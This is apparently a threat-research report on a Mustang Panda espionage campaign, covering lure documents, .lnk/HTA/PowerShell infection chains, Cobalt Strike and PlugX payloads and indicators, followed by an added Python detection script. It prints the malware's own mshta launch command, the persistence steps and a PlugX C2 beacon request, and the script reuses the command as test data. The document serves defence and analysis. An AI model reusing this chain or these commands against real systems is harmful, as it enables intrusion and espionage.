China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations

This whitepaper examines a campaign believed to be conducted by China-based threat group, Mustang Panda. Read the paper from Anomali Threat Research.

Anomali Threat Research
October 7, 2019
<h2>Overview</h2> <p>The Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect 19, the company’s annual user conference, in a session titled “Mustang Panda Riding Across Country Lines.”</p> <p>CrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of observing malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).<sup>[1]</sup> This campaign dates back to at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the impact the campaign has had. Based on the lure documents observed by Anomali, we believe that the following may be targeted:</p> <ul> <li>Individuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in Iraq and the Levant (ISIL / Da’esh)</li> <li>Mongolian-based MIAT Airlines</li> <li>Non-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit organization’s aim is to foster encounters and exchange between cultures and religions in the West and in China</li> <li>Targeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam</li> <li>The Communist Party of Vietnam (CPV)</li> <li>The Shan Tai, a group of people living in Southeast Asia, which Minority Rights Group International describes as a “minority” in the region, with members who are primarily Theravada Buddhists</li> </ul> <p>The malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike. 
The observed TTPs consist of the following:</p> <ol> <li>Use of a zip file that contains a “.lnk” (Windows Shortcut) file.</li> <li>Utilization of the double-extension trick (sample.doc.lnk) to convince users to open the file.</li> <li>HTA (HTML Application) with VBScript embedded in the “.lnk” file.</li> <li>VBScript drops payloads and opens a decoy document or PDF for the user.</li> <li>Usage of PlugX and Cobalt Strike payloads.<sup>[2]</sup></li> </ol> <p>The infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.</p> <p style="text-align: center;"><em><img alt="Figure 1 – Infection vector" src="https://cdn.filestackcontent.com/y4n8QQVFSSueTIlWKe2T"/><br/> Figure 1 – Infection vector</em></p> <p>We also found similarities in the targeting of Mongolia and of an NGO. The use of United Nations’ documents regarding activities in the Middle East may also be indicative of think-tank targeting. Furthermore, the use of PlugX malware also aligns with CrowdStrike’s previous findings of activity attributed to Mustang Panda.<sup>[3]</sup></p> <p>Analysts’ note: The language capabilities needed to read some of the lure documents are not available within Anomali at this time. We would encourage those with the necessary language skills to analyze the documents further.</p> <h2>Targeting</h2> <p>In mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence collection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing is being utilized, because it aligns with Mustang Panda’s TTPs and is a common tactic amongst APT actors. 
The lure documents are also highly specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.</p> <p>Further analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a Cobalt Strike Beacon (a penetration-testing tool) or PlugX (a Remote Access Tool (RAT)); other payloads could not be identified as of this writing. Anomali researchers identified 15 malicious documents that we believe were utilized by Mustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to August 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which are analyzed further in the following sections. In addition, the dates within the documents go back as far as October 8, 2017; therefore, it is possible this activity goes back to 2017 if the group was using current content in its lures. The primary target of this campaign was found to be the ruling political party of Vietnam, The Communist Party of Vietnam (CPV); other targets observed in the malicious documents include the following:</p> <ul> <li>CPV of Lang Son province, Vietnam</li> <li>CPV of Lao Cai province, Vietnam</li> <li>Embassy of Vietnam, China</li> <li>Henan Provincial Party Committee, Vietnam</li> <li>Individuals who would find United Nations’ documents of interest, potentially think tanks</li> <li>MIAT Airlines, Mongolian airline</li> <li>Police of Sindh Province, Pakistan</li> <li>Restoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)</li> <li>The China Center (China Zentrum e.V), Germany</li> </ul> <p>The lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are publicly available. 
The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA script that, once executed, drops and opens the decoy document while the malicious payload runs in the background. The final type of malicious document we observed was empty apart from an image, such as a request to enable macros, used to distract the user while malicious activity takes place in the background.</p> <h2>Lure Document Analysis</h2> <p>The 15 documents are discussed below from the most recent VT submission to the earliest. The identified samples follow the same infection chain, and the technical analysis is discussed in a later section.</p> <p><strong>Document</strong> – 1<br/> <strong>Document Title</strong> – TCO BT574.doc<br/> <strong>Sample</strong> – 05CF906B750EB335125695DA42F4EAFC<br/> <strong>Payload</strong> – Cobalt Strike<br/> <strong>Submission date</strong> – 8/29/2019 1:27:41 AM</p> <p style="text-align: center;"><em><img alt="Figure 2 – TCO BT574.doc" src="https://cdn.filestackcontent.com/jfI7wHEiQumgR8DKJtC4"/><br/> Figure 2 – TCO BT574.doc</em></p> <p>As seen above, this document is addressed to the Embassy of Vietnam in China. The document appears to discuss a warning issued to the Vietnamese government related to a military exercise at a set of coordinates. Specifically, the document states that no civilian ships are allowed within said coordinates. The document continues and mentions a new ice-breaking ship called “Snow Dragon 2”, giving August 15, 2019, as the beginning of a 35-day trial run. 
This document indicates a regional interest with specificity.</p> <p><strong>Document</strong> – 2<br/> <strong>Document Title</strong> – 32_1.PDF<br/> <strong>Sample</strong> – 9A180107EFB15A00E64DB3CE6394328D<br/> <strong>Payload</strong> – Cobalt Strike Beacon<br/> <strong>Submission date</strong> – 8/26/2019 6:28:40 AM</p> <p style="text-align: center;"><em><img alt="Figure 3 – 32_1.pdf" src="https://cdn.filestackcontent.com/bvCv0P95T9GVw4hHemwO"/><br/> Figure 3 – 32_1.pdf</em></p> <p>Mustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee of Lang Son Province. The People’s Committee is the executive branch of a Vietnamese province.<sup>[4]</sup> The Lang Son province shares a border with China’s Guangxi Province. The area has historically served as an important location for trade, and therefore control over the location has long been disputed and fought over.<sup>[5]</sup> The border shared between China and Vietnam measures 1,281 km in length; multiple wars have been fought over it and numerous lives lost, the complexities and intricacies of which will not be discussed further.<sup>[6]</sup></p> <p><strong>Document</strong> – 3<br/> <strong>Document Title</strong> – Daily News (19-8-2019)<br/> <strong>Sample</strong> – 5F094CB3B92524FCED2731C57D305E78<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 8/19/2019 6:11:32 AM</p> <p style="text-align: center;"><em><img alt="Figure 4 – Daily News (19-8-2019)" src="https://cdn.filestackcontent.com/R7QPTzQwTnebIkNjiBPD"/><br/> Figure 4 – Daily News (19-8-2019)</em></p> <p>This document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan State (RCSS). 
The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in Northwestern and Eastern Myanmar (Burma) and the Yunnan province in China.<sup>[7]</sup> The RCSS, also referred to as the Shan State Army (SSA), is a government/political organization headquartered in Loi Tai Leng, Southern Shan state, in present-day Myanmar (Burma), bordering Thailand.<sup>[8]</sup> The targeting of minority groups is a known tactic used by the government of the People’s Republic of China.</p> <p><strong>Document</strong> – 4<br/> <strong>Document Title</strong> – S_2019_50_E.lnk<br/> <strong>Sample</strong> – 4FE276EDC21EC5F2540C2BABD81C8653<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/6/2019 9:37:18 AM</p> <p style="text-align: center;"><em><img alt="Figure 5 – S_2019_50_E.docx" src="https://cdn.filestackcontent.com/oCkLkzrmQNC7EtxeAv3i"/><br/> Figure 5 – S_2019_50_E.docx</em></p> <p>Mustang Panda retrieved this document from the United Nations Digital Library; it is titled “Letter dated 15 January 2019 from the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253 (2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings and Entities addressed to the President of the Security Council.”<sup>[9]</sup></p> <p>At the time of this writing, it is unknown who, or what, this document may be targeting. 
However, think-tank organizations may be interested in such a document, and said organizations were found to be targets of Mustang Panda by CrowdStrike.<sup>[10]</sup></p> <p><strong>Document</strong> – 5<br/> <strong>Document Title</strong> – European.lnk<br/> <strong>Sample</strong> – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC<br/> <strong>Payload</strong> – PlugX<br/> <strong>Submission date</strong> – 6/5/2019 6:28:25 PM</p> <p style="text-align: center;"><em><img alt="Figure 6 – European.lnk" src="https://cdn.filestackcontent.com/bwhR0rpIQgpxDhmMMSEc"/><br/> Figure 6 – European.lnk</em></p> <p>“European.doc” targets The China Center (China Zentrum e.V), which is, according to its website, a non-profit organization that “encourages encounters and exchange between cultures and religions in the West and in China. The members of the China-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”<sup>[11]</sup></p> <p>Targeting of NGOs was first documented by CrowdStrike, and we believe we have observed Mustang Panda attempting to attack a similar type of target.<sup>[12]</sup> In addition, an institution focused on exchanging cultural knowledge aligns with China’s strategic interests.</p> <h2>Targeting Pakistan</h2> <p>Upon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali found a malicious sample that targets the Police of the Sindh Province in Pakistan. 
PlugX was observed as the payload targeting the Sindh Province police.</p> <p style="text-align: center;"><em><img alt="Figure 7 – Samples Connecting to apple-net[.]com" src="https://cdn.filestackcontent.com/4fEHm9JlTOic9xhJQi9Y"/><br/> Figure 7 – Samples Connecting to apple-net[.]com</em></p> <p style="text-align: center;"><em><img alt="Figure 8 – DSR &amp; CSR of Special Branch Sind.exe" src="https://cdn.filestackcontent.com/4YdqcEqKSYKupmOdV1w8"/><br/> Figure 8 – DSR &amp; CSR of Special Branch Sind.exe</em></p> <h2>Technical Analysis</h2> <p>The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA file with VBScript or a PowerShell script that, once executed, drops and opens the decoy document while the malicious payload runs in the background. Throughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.</p> <p style="text-align: center;"><em><img alt="Figure 9 – Infection vector" src="https://cdn.filestackcontent.com/lX9bt3vfQHmuNwsCxLa5"/><br/> Figure 9 – Infection vector</em></p> <h3>“.lnk” File Analysis</h3> <p>In Windows, “.lnk” is the file extension for shortcut files, which point to an executable file. “.lnk” files usually hold plenty of forensic artifacts and can reveal valuable information about the threat actor’s environment. 
The metadata from the “.lnk” files led us to pivot to more samples from the same campaign.</p> <p style="text-align: center;"><em><img alt="Figure 10 – “.lnk” File" src="https://cdn.filestackcontent.com/lhM4qsRRaWc1LgysWwtQ"/><br/> Figure 10 – “.lnk” File</em></p> <p>Table 1 below shows the files that were part of the recent campaign from Mustang Panda.</p> <p style="text-align: center;"><em>Table 1 – Analyzed Samples</em></p> <table class="table table-striped" style="table-layout: fixed;"> <tbody>
<tr> <th>MD5</th> <th>Link Creation Date</th> <th>File Name</th> <th>Payload</th> </tr>
<tr> <td style="word-wrap: break-word;">165F8683681A4B136BE1F9D6EA7F00CE</td> <td>11/21/10 3:24</td> <td>chuong trinh dang huong.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">9FF1D3AF1F39A37C0DC4CEEB18CC37DC</td> <td>11/21/10 3:24</td> <td>European.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">4FE276EDC21EC5F2540C2BABD81C8653</td> <td>11/21/10 3:24</td> <td>S_2019_50_E.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">11ADDA734FC67B9CFDF61396DE984559</td> <td>11/21/10 3:24</td> <td>Chuong trinh hoi nghi.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">08F25A641E8361495A415C763FBB9B71</td> <td>11/21/10 3:24</td> <td>GIAY MOI.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">01D74E6D9F77D5202E7218FA524226C4</td> <td>11/21/10 3:24</td> <td>421 CV.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">6198D625ADA7389AAC276731CDEBB500</td> <td>11/21/10 3:24</td> <td>GIAYMOI.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">9B39E1F72CF4ACFFD45F45F08483ABF0</td> <td>11/21/10 3:24</td> <td>CV trao doi CAT Cao Bang.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">748DE2B2AA1FA23FA5996F287437AF1B</td> <td>11/20/10 21:29</td> <td>cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">5F094CB3B92524FCED2731C57D305E78</td> <td>11/21/10 3:24</td> <td>Daily News (19-8-2019)(Soft Copy).lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">9A180107EFB15A00E64DB3CE6394328D</td> <td>11/21/10 3:24</td> <td>32_1.PDF.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">05CF906B750EB335125695DA42F4EAFC</td> <td>11/21/10 3:24</td> <td>TCO BT 574.doc.lnk</td> <td>Cobalt Strike</td> </tr>
<tr> <td style="word-wrap: break-word;">F62DFC4999D624D01E94B89946EC1036</td> <td>11/21/10 3:24</td> <td>sach tham khao Bo mon.docx.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">CA775717D000888A7F71A5907B9C9208</td> <td>11/21/10 3:24</td> <td>tieu luan ve quyen lam chu cua nhan dan.docx.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">AA115F20472E78A068C1BBF739C443BF</td> <td>11/21/10 3:24</td> <td>vai tro cua nhan dan.doc.lnk</td> <td>PlugX</td> </tr>
<tr> <td style="word-wrap: break-word;">11511b3d69fbb6cceaf1dd0278cbedfb</td> <td>11/21/10 3:24</td> <td>For National Department Sar KNU JMC people Meeting 2019.lnk</td> <td>PlugX</td> </tr>
</tbody> </table> <p>Once the user opens the “.lnk” file, the embedded HTA file is executed via “mshta.exe”, which then writes a PowerShell script named “3.ps1” to the “%TEMP%” directory. 
The PowerShell script is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.<sup>[13]</sup></p> <p style="text-align: center;"><em><img alt="Figure 11 – VBScript drops PowerShell script" src="https://cdn.filestackcontent.com/Q6vUTjTPeLSiovqEWB4w"/><br/> Figure 11 – VBScript drops PowerShell script</em></p> <p style="text-align: center;"><em><img alt="Figure 12 – Using WMI to execute PowerShell Script in Hidden window" src="https://cdn.filestackcontent.com/jy9OTfjRruoJJpllyO7G"/><br/> Figure 12 – Using WMI to execute PowerShell Script in Hidden window</em></p> <p>The dropped file “3.ps1” is a base64-encoded PowerShell script. Upon execution it performs the following operations on the target host:</p> <ol> <li>Checks whether the user has Administrator privileges</li> <li>Drops the Cobalt Strike stager as “tmp_FlVnNI.dat” in the “debug” or “%TEMP%” directory, depending on the user’s privileges</li> <li>Opens the decoy Word document</li> <li>Locates InstallUtil.exe and its installed version</li> <li>Copies “schtasks.exe” to the “%TEMP%” directory and renames it to “wtask.exe”</li> <li>Creates a scheduled task named “Security Script kb00855787”</li> <li>Renames “wscript.exe” to “winwsh.exe”</li> <li>Runs the scheduled task to execute the Cobalt Strike stager</li> <li>Initiates C2 communication</li> </ol> <p style="text-align: center;"><em><img alt="Figure 13 – Scheduled Task Creation" src="https://cdn.filestackcontent.com/unrWhdRtTACc7O1MhLzx"/><br/> Figure 13 – Scheduled Task Creation</em></p> <p style="text-align: center;"><em><img alt="Figure 14 – PowerShell Script Creates Scheduled Task" src="https://cdn.filestackcontent.com/RfyFg3DQuOFIYxoAshL5"/><br/> Figure 14 – PowerShell Script Creates Scheduled Task</em></p> <p style="text-align: center;"><em><img alt="Figure 15 – Cobalt Strike Payload" src="https://cdn.filestackcontent.com/2OfnXlVCQquS5ftxheGA"/><br/> Figure 15 – Cobalt Strike Payload</em></p> <p>During our analysis, we could not acquire the second-stage payload, as the C2 servers were not functioning or had been taken down by the threat actors.</p> <h3>PlugX Payload Analysis</h3> <p>“.lnk” files that used PlugX as the payload were abnormally large. In general, “.lnk” files are less than 10 KB, but the malicious samples in this campaign were more than 700 KB. Upon taking a closer look, we found that the “.lnk” files had three base64-encoded executables embedded in them.</p> <p>Upon opening the LNK file, it proceeds to execute the command below via cmd.exe.</p> <p><strong>command:</strong> <code>/c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir "%x\tieu luan ve quyen lam chu cua nhan dan.docx.lnk" /s /b') do start m%windir:~-1,1%hta.exe "%i"</code></p> <p>The command executes the HTA file embedded inside the shortcut, which decodes and drops three executables in the “%TEMP%” directory and opens a decoy Word document for the user.</p> <p style="text-align: center;"><em><img alt="Figure 16 – Extracted binaries and Decoy document" src="https://cdn.filestackcontent.com/KLb2O2GOTgGYHNRAFWDV"/><br/> Figure 16 – Extracted binaries and Decoy document</em></p> <p>All three dropped files were then moved to a new folder, “C:\ProgramData\Microsoft Malware Protection\GHQ”.</p> <p style="text-align: center;"><em><img alt="Figure 17 – Binaries moved to different path" src="https://cdn.filestackcontent.com/85tIfVOtT8WVTb3jSa2o"/><br/> Figure 17 – Binaries moved to different path</em></p> <p>“3.exe” is a legitimate executable signed by “ESET, spol. s r.o.”; it is abused via a DLL hijacking (side-loading) technique to execute http_dll.dll, which decodes and loads the malicious payload http_dll.dat.</p> <p style="text-align: center;"><em>Table 2 – PlugX Hashes</em></p> <table class="table table-striped" style="table-layout: fixed;"> <thead> <tr> <th>File Name</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>3.exe (original name: EHttpSrv.exe)</td> <td style="word-wrap: break-word;">28C6F235946FD694D2634C7A2F24C1BA</td> </tr> <tr> <td>http_dll.dll</td> <td style="word-wrap: break-word;">9912EB641EABD640A476720C51F5E3AD</td> </tr> <tr> <td>http_dll.dat</td> <td style="word-wrap: break-word;">2BC7298A57AE2B8AB5B4A7B53360EB5C</td> </tr> </tbody> </table> <p>After the payload executes, it reaches out to the C2 via a POST request, as shown below.</p> <pre>
POST /update?wd=4337295e HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Host: aridndvn.ccom:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache
</pre> <p>If the C2 is not available, the payload tries to reach different embedded C2 domains on unique ports.</p> <p style="text-align: center;"><em><img alt="Figure 18 – Network connections to C2" src="https://cdn.filestackcontent.com/wONhRfObTXCh731MRBQz"/><br/> Figure 18 – Network connections to C2</em></p> <h2>Conclusion</h2> <p>The malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. The targets, indicated by the specific lure documents, are governmental or align strategically with the interests of a China-sponsored APT group. China is currently in its 13th Five-Year Plan (2016-2020), which focuses on the following themes: innovation, coordinated development, green growth, openness, and inclusive growth.<sup>[14]</sup> The objective of increasing exports and specific imports, which falls under openness, would align with the targeting of the Lang Son province and its history of trade. 
Utilizing lures themed around political parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of China’s development strategy” and as attempting to “enhance its future global competitiveness and technological edge.”<sup>[15]</sup> Targeting the entities, or related entities, of said lures indicates a potential regional interest in strategic information that may be of significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by Anomali.</p> <p>This activity has been ongoing since at least November 2018, and possibly as far back as October 2017 if the lure documents were distributed around the times mentioned in them. This kind of malicious activity sponsored by China will likely continue as the country expands its efforts for the ongoing Belt and Road Initiative, which seeks to invest in infrastructure in over 100 countries. Such economic and investment-led initiatives will make China more interested in the regions it is investing in; therefore, it is likely that APT-related activity will follow.</p> <h2>IOCs</h2> <p>In addition, ATR found that the documents were attempting to, or were able to, connect to a set of Command and Control (C2) domains and IP addresses, including the apple-net[.]com domain discussed above.</p> 
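<p>The following is an added detection example, not code from the Anomali report. It turns the host artifacts described in the Technical Analysis section (the <code>m%windir:~-1,1%hta</code> launch against a .lnk, the hidden PowerShell run of <code>%TEMP%\3.ps1</code> via WMI, the renamed schtasks.exe creating the “Security Script kb00855787” task, the staging folder under ProgramData) and the PlugX POST request quoted above into Python rules run over constructed Sysmon-style process events and the quoted request. The event field names, the sample events and the rule conditions are assumptions.</p>

```python
"""Detection logic for the .lnk -> mshta -> PowerShell -> Cobalt Strike / PlugX
chain described in this report.  Added example, not Anomali's code: field names
(Sysmon Event ID 1 style), rule conditions and the sample events are constructed."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # keys: image, parent_image, command_line


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_mshta_from_lnk(ev: Event) -> bool:
    """cmd.exe assembling 'mshta.exe' from %windir:~-1,1% and pointing it at a .lnk."""
    cl = ev["command_line"].lower()
    return _base(ev["image"]) == "cmd.exe" and "%windir:~-1,1%hta" in cl and ".lnk" in cl


def rule_ps1_from_temp_via_wmi(ev: Event) -> bool:
    """Hidden PowerShell running %TEMP%\\3.ps1; WMI-created processes have WmiPrvSE.exe as parent."""
    cl = ev["command_line"].lower()
    return (_base(ev["image"]) == "powershell.exe"
            and re.search(r"\\temp\\3\.ps1\b", cl) is not None
            and "hidden" in cl
            and _base(ev["parent_image"]) == "wmiprvse.exe")


def rule_renamed_schtasks(ev: Event) -> bool:
    """schtasks.exe copied to %TEMP% as wtask.exe and creating the 'Security Script kb00855787' task."""
    cl = ev["command_line"].lower()
    return _base(ev["image"]) == "wtask.exe" and "/create" in cl and "security script kb00855787" in cl


def rule_plugx_sideload_dir(ev: Event) -> bool:
    """Anything executing from the folder the three PlugX files are moved to (signed 3.exe + http_dll.dll)."""
    return "\\programdata\\microsoft malware protection\\ghq\\" in ev["image"].lower()


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("mshta_from_lnk", rule_mshta_from_lnk),
    ("ps1_from_temp_via_wmi", rule_ps1_from_temp_via_wmi),
    ("renamed_schtasks", rule_renamed_schtasks),
    ("plugx_sideload_dir", rule_plugx_sideload_dir),
]


def scan_process_events(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, pred in RULES if pred(ev)]


PLUGX_HEADERS = {"x-debug", "x-request", "x-content", "x-storage"}


def plugx_beacon_indicators(raw_request: str) -> List[str]:
    """PlugX-style traits present in a raw HTTP request (empty list means no match)."""
    lines = raw_request.strip().splitlines()
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    ua = headers.get("user-agent", "")
    found = []
    if re.fullmatch(r"POST /update\?wd=[0-9a-f]{8} HTTP/1\.[01]", request_line):
        found.append("update-wd-uri")
    if PLUGX_HEADERS.issubset(headers):
        found.append("x-debug/x-request/x-content/x-storage headers")
    if request_line.startswith("POST") and headers.get("content-length") == "0":
        found.append("empty POST body")
    if "MSIE 6.0" in ua and "SV1" in ua:
        found.append("legacy MSIE 6.0 SV1 user-agent")
    return found


# Constructed sample events modelled on the chain in the report (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'''cmd.exe /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir "%x\tieu luan ve quyen lam chu cua nhan dan.docx.lnk" /s /b') do start m%windir:~-1,1%hta.exe "%i"'''},
    {"image": PS, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\victim\AppData\Local\Temp\3.ps1"},
    {"image": r"C:\Users\victim\AppData\Local\Temp\wtask.exe", "parent_image": PS,
     "command_line": r'wtask.exe /create /sc minute /tn "Security Script kb00855787" /tr C:\Users\victim\AppData\Local\Temp\winwsh.exe'},
    {"image": r"C:\ProgramData\Microsoft Malware Protection\GHQ\3.exe", "parent_image": PS,
     "command_line": "3.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\victim\notes.txt"},  # benign control
]

# C2 request as quoted in the report (Host value left exactly as printed there).
PLUGX_REQUEST = """POST /update?wd=4337295e HTTP/1.1
Accept: */*
x-debug: 0
x-request: 0
x-content: 61456
x-storage: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
Host: aridndvn.ccom:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache"""

BENIGN_REQUEST = "GET /index.html HTTP/1.1\nHost: intranet.example\nUser-Agent: curl/7.64.1"

if __name__ == "__main__":
    for idx, rule in scan_process_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print(plugx_beacon_indicators(PLUGX_REQUEST))
```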
<h2>Endnotes</h2> <p><sup>[1]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog, accessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.</p> <p><sup>[2]</sup> Ibid.</p> <p><sup>[3]</sup> Ibid.</p> <p><sup>[4]</sup> Dr. Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016): 5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.</p> <p><sup>[5]</sup> Kathy Wilhelm, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over Friendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times, accessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.</p> <p><sup>[6]</sup> “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019, https://www.globalsecurity.org/military/world/vietnam/geography.htm.</p> <p><sup>[7]</sup> The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019, https://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019, https://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.</p> <p><sup>[8]</sup> “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018, https://www.mmpeacemonitor.org/1598.</p> <p><sup>[9]</sup> United Nations Digital Library, accessed September 18, 2019, https://digitallibrary.un.org/record/1663461.</p> <p><sup>[10]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[11]</sup> China-Zentrum, accessed September 18, 2019, http://www.china-zentrum.de/.</p> <p><sup>[12]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[13]</sup> Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019, https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.</p> <p><sup>[14]</sup> Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission, accessed September 20, 2019, published February 14, 2017, https://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf. 3.</p> <p><sup>[15]</sup> Ibid.</p>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Discover More About Anomali

Get the latest news about Anomali's Security and IT Operations platform,

SEe all Resources
No items found.
No items found.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

October 7, 2019
-
Anomali Threat Research
,

China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations

<h2>Overview</h2> <p>The Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group, Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect 19, the company’s annual user conference, in a session titled: “Mustang Panda Riding Across Country Lines.”</p> <p>CrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of observing malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).<sup>[1]</sup> This campaign dates back to at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the impact the campaign has had. Based on the lure documents observed by Anomali, we believe that the following may be targeted:</p> <ul> <li>Individuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in Iraq and the Levant (ISIL / Da’esh)</li> <li>Mongolian-based MIAT Airlines</li> <li>Non-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit organization’s aim is to foster encounters and exchange between cultures and religions in the West and in China</li> <li>Targeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam</li> <li>The Communist Party of Vietnam (CVP)</li> <li>The Shan Tai; a group of people living in Southeast Asia, which Minority Rights Group International describes as a “minority” in the region, with members who are primarily Theravada Buddhists</li> </ul> <p>The malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike. 
